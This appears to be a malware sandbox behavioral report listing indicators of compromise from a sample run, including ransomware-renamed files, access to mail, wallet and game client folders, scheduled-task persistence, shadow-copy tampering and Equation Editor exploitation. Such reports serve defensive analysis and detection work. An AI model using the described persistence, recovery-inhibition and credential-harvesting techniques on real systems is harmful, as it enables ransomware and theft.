File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Paramaribo.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\FlickLearningWizard.exe.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Winamac.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationUp_SelectionSubpicture.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.properties.Cyborg Builder Ransomware	wscript.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Office14\MSOUC.EXE	bot.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\lv-LV\tipresx.dll.mui.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jfxmedia.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana.Cyborg Builder Ransomware	wscript.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	svchost.com
File created	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\TipBand.dll.mui.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.jpg.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\System\Ole DB\oledb32.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\ParentMenuButtonIcon.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Internet Explorer\IEShims.dll.Cyborg Builder Ransomware	wscript.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	svchost.com
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\White_Chocolate.jpg.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToNotesBackground.wmv.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\TabTip.exe.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\tipresx.dll.mui.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\specialmainsubpicture.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\CircleSubpicture.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\Center.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Common Files\Microsoft Shared\Stationery\Dotted_Lines.emf.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-back-static.png.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\manifest.json.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\fontmanager.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jsound.dll.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins.Cyborg Builder Ransomware	wscript.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf.Cyborg Builder Ransomware	wscript.exe

Drops file in Windows directory 64 IoCs

Processes:

[email protected]svchost.comEQNEDT32.EXEsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comWINWORD.EXEsvchost.comsvchost.com

description	ioc	Process
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\outlook	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	EQNEDT32.EXE
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\steam	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\thunderbird	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	EQNEDT32.EXE
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\office	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\documents	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel	[email protected]
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\the bat!	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\bitcoin	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\the bat!	[email protected]
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\desktop	[email protected]
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\onenote	[email protected]
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\onenote	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\powerpoint	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\steam	[email protected]
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\bitcoin	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\office	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\word	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat!	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\documents	[email protected]
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\excel	[email protected]
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint	[email protected]

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
3684	sc.exe
1952	sc.exe
5320	sc.exe
5928	sc.exe
3516	sc.exe
4220	sc.exe
3888	sc.exe
2060	sc.exe
1920	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
1128	748	WerFault.exe	161
3744	1100	WerFault.exe	280
3972	2452	WerFault.exe	281
3708	5720	WerFault.exe	470
4888	948	WerFault.exe	466
3680	1132	WerFault.exe	519

Office loads VBA resources, possible macro or embedded object present

Creates scheduled task(s) 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	Process
2560	schtasks.exe
3652	schtasks.exe
2108	schtasks.exe
2344	schtasks.exe
2832	schtasks.exe
2096	schtasks.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
1852	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

Processes:

taskkill.exe

pid	Process
880	taskkill.exe

Launches Equation Editor 1 TTPs 2 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

Processes:

EQNEDT32.EXEEQNEDT32.EXE

pid	Process
512	EQNEDT32.EXE
1476	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 61 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeWINWORD.EXEEXCEL.EXEmshta.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3B9DBAF1-F716-11EE-9B26-EA263619F6CB} = "0"	iexplore.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

EXCEL.EXE

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print	EXCEL.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\""	EXCEL.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	EXCEL.EXE
